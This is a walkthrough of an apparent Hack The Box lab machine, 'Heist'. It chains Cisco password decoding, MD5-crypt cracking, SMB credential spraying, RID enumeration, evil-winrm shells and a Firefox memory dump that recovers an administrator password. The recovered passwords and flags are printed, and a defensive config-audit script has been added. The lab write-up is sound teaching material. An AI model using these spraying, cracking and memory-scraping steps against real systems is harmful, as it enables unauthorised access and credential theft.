$ nmap -p- -T4 -A 10.10.10.149
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
| http-title: Support Login Page
|_Requested resource was login.php
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds?
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49669/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 12m27s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-07-16T16:13:30
|_ start_date: N/A
The support ticket at http://10.10.10.149/issues.php names two users, Hazard and Admin, and references an attachment:
http://10.10.10.149/attachments/config.txt
The attachment is a Cisco IOS config. It holds an enable secret stored as type 5 (MD5-crypt) and two user passwords stored as type 7, which is a reversible encoding rather than a hash:
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
Crack the type 5 hash with john and rockyou; MD5-crypt is fast enough that it falls in about 30 seconds:
$ john -w:/usr/share/wordlists/rockyou.txt ciscotype5.txt
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 128/128 AVX 4x3])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
stealth1agent (?)
1g 0:00:00:31 DONE (2021-07-16 13:40) 0.03144g/s 110230p/s 110230c/s 110230C/s stealthy001..steak7893
Use the "--show" option to display all of the cracked passwords reliably
Session completed
Type 7 strings need no cracking at all; decoding them (here with https://packetlife.net/toolbox/type7/) gives:
admin:Q4)sJu\Y8qz*A3?d
rout3r:$uperP@ssword
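As an added example (not part of the original writeup), a small config-audit script that implements the public type 7 algorithm and checks the two strings from config.txt; `audit_config`, `decode_type7` and the sample config are constructed here, and `service password-encryption` appears only because it is the IOS command that produces type 7 strings.

```python
"""Audit a Cisco IOS config for credentials that are not properly hashed.

Type 7 is reversible (fixed XOR key, two-digit key offset) and type 5 is
MD5-crypt, which a wordlist attack runs through at ~100k guesses/s.
Type 8 (PBKDF2-SHA256) and type 9 (scrypt) are the acceptable forms.
"""
import re

# Fixed key used by Cisco's type 7 obfuscation; it has been public for decades.
XLAT = "dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv9873254k;fg87"


def decode_type7(enc: str) -> str:
    """Reverse a type 7 string: two-digit key offset, then XOR'd hex bytes."""
    if len(enc) < 4 or len(enc) % 2 or not enc[:2].isdigit():
        raise ValueError("not a type 7 string: %r" % enc)
    seed = int(enc[:2])
    body = bytes.fromhex(enc[2:])  # raises ValueError on non-hex input
    return "".join(chr(b ^ ord(XLAT[(seed + i) % len(XLAT)])) for i, b in enumerate(body))


USER_T7 = re.compile(r"^\s*username\s+(\S+)\s.*?\bpassword\s+7\s+([0-9A-Fa-f]+)")
SECRET = re.compile(r"^\s*(enable secret|username\s+\S+.*?\bsecret)\s+(\d)\s+\S+")


def audit_config(text: str):
    """Return one finding per weak credential line: (line_no, severity, detail)."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        m = USER_T7.match(line)
        if m:
            user, enc = m.groups()
            findings.append((n, "reversible", f"{user}: type 7 decodes to {decode_type7(enc)!r}"))
            continue
        m = SECRET.match(line)
        if m and m.group(2) == "5":
            findings.append((n, "weak-hash", f"{m.group(1)} uses type 5 (MD5-crypt); move to type 9 (scrypt)"))
    return findings


# Constructed sample: the three credential lines quoted in the writeup.
SAMPLE_CONFIG = """\
service password-encryption
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
"""

if __name__ == "__main__":
    for line_no, severity, detail in audit_config(SAMPLE_CONFIG):
        print(f"line {line_no:>2} [{severity}] {detail}")
```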
Collect the usernames and the three recovered passwords in user.txt and passwd.txt, then test every combination against SMB with crackmapexec:
$ crackmapexec smb 10.10.10.149 -u user.txt -p passwd.txt
SMB 10.10.10.149 445 SUPPORTDESK [*] Windows 10.0 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:False)
SMB 10.10.10.149 445 SUPPORTDESK [-] SupportDesk\admin:stealth1agent STATUS_LOGON_FAILURE
SMB 10.10.10.149 445 SUPPORTDESK [-] SupportDesk\admin:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
SMB 10.10.10.149 445 SUPPORTDESK [-] SupportDesk\admin:$uperP@ssword STATUS_LOGON_FAILURE
SMB 10.10.10.149 445 SUPPORTDESK [-] SupportDesk\administrator:stealth1agent STATUS_LOGON_FAILURE
SMB 10.10.10.149 445 SUPPORTDESK [-] SupportDesk\administrator:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
SMB 10.10.10.149 445 SUPPORTDESK [-] SupportDesk\administrator:$uperP@ssword STATUS_LOGON_FAILURE
SMB 10.10.10.149 445 SUPPORTDESK [+] SupportDesk\hazard:stealth1agent
$ smbclient -N -L \\\\10.10.10.149\\
session setup failed: NT_STATUS_ACCESS_DENIED
$ nullinux -shares 10.10.10.149
$ nullinux -users 10.10.10.149
$ smbmap -H 10.10.10.149 -u hazard -p stealth1agent
[+] IP: 10.10.10.149:445 Name: 10.10.10.149
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
Read access to IPC$ is enough to brute-force RIDs over the LSARPC pipe and enumerate the local accounts:
$ lookupsid.py hazard:stealth1agent@10.10.10.149
Impacket v0.9.23.dev1 - Copyright 2020 SecureAuth Corporation
[*] Brute forcing SIDs at 10.10.10.149
[*] StringBinding ncacn_np:10.10.10.149[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-4254423774-1266059056-3197185112
500: SUPPORTDESK\Administrator (SidTypeUser)
501: SUPPORTDESK\Guest (SidTypeUser)
503: SUPPORTDESK\DefaultAccount (SidTypeUser)
504: SUPPORTDESK\WDAGUtilityAccount (SidTypeUser)
513: SUPPORTDESK\None (SidTypeGroup)
1008: SUPPORTDESK\Hazard (SidTypeUser)
1009: SUPPORTDESK\support (SidTypeUser)
1012: SUPPORTDESK\Chase (SidTypeUser)
1013: SUPPORTDESK\Jason (SidTypeUser)
Add the newly enumerated usernames to user.txt and re-run crackmapexec; one more combination works:
chase:Q4)sJu\Y8qz*A3?d
Chase reused the router admin password. With WinRM open on 5985, evil-winrm gives a shell:
$ evil-winrm -i 10.10.10.149 -u chase -p "Q4)sJu\Y8qz*A3?d"
Evil-WinRM shell v2.4
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Chase\Documents> dir
Directory: C:\Users\Chase\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 7/16/2021 6:50 PM 131222387 d.txt
-a---- 7/16/2021 6:44 PM 522118121 firefox.exe_210716_184454.dmp
-a---- 7/16/2021 6:40 PM 384888 procdump64.exe
-a---- 7/16/2021 6:48 PM 478088 strings64.exe
*Evil-WinRM* PS C:\Users\Chase\Documents> type ..\Desktop\user.txt
a127daef77ab6d9d92008653295f59c4
*Evil-WinRM* PS C:\inetpub> type wwwroot/login.php
if( $_REQUEST['login_username'] === 'admin@support.htb' && hash( 'sha256', $_REQUEST['login_password']) === '91c077fb5bcdd1eacf7268c945bc1d1ce2faf9634cba615337adbf0af4db9040') {
The password is compared as an unsalted SHA-256 digest, so a precomputed-hash lookup (https://md5hashing.net/hash/sha256/) returns the plaintext; a salted, slow hash via password_hash()/password_verify() would have prevented this:
91c077fb5bcdd1eacf7268c945bc1d1ce2faf9634cba615337adbf0af4db9040
4dD!5}x/re8]FBuZ
Several firefox processes are running in Chase's session, which makes the browser's memory the next place to look for credentials:
*Evil-WinRM* PS C:\Users\Chase\Documents> ps
Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName
356 25 16412 297508 0.09 6196 1 firefox
1054 76 190652 544140 7.17 6440 1 firefox
347 20 10044 34816 0.06 6548 1 firefox
401 37 49728 109880 1.05 6708 1 firefox
378 29 29660 66172 1.09 6984 1 firefox
*Evil-WinRM* PS C:\Users\Chase\desktop> upload procdump64.exe
Dump a firefox process with procdump64.exe, run strings64.exe over the dump and search the output (str.txt) for the login parameters:
$ grep password= str.txt
http://localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
The login form submitted the credentials as GET parameters, so the full URL, password included, was still resident in the browser process memory.
The same password is reused for the local administrator account. Note that bash history expansion fires on `!5` inside double quotes, so the password has to be single-quoted:
kali@kali:~/0.htb/machines/Heist149$ evil-winrm -i 10.10.10.149 -u administrator -p "4dD!5}x/re8]FBuZ"
bash: !5: event not found
kali@kali:~/0.htb/machines/Heist149$ evil-winrm -i 10.10.10.149 -u administrator -p '4dD!5}x/re8]FBuZ'
Evil-WinRM shell v2.4
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
50dfa3c6bfd20e2e0d071b073d766897
*Evil-WinRM* PS C:\Users\Administrator\Desktop>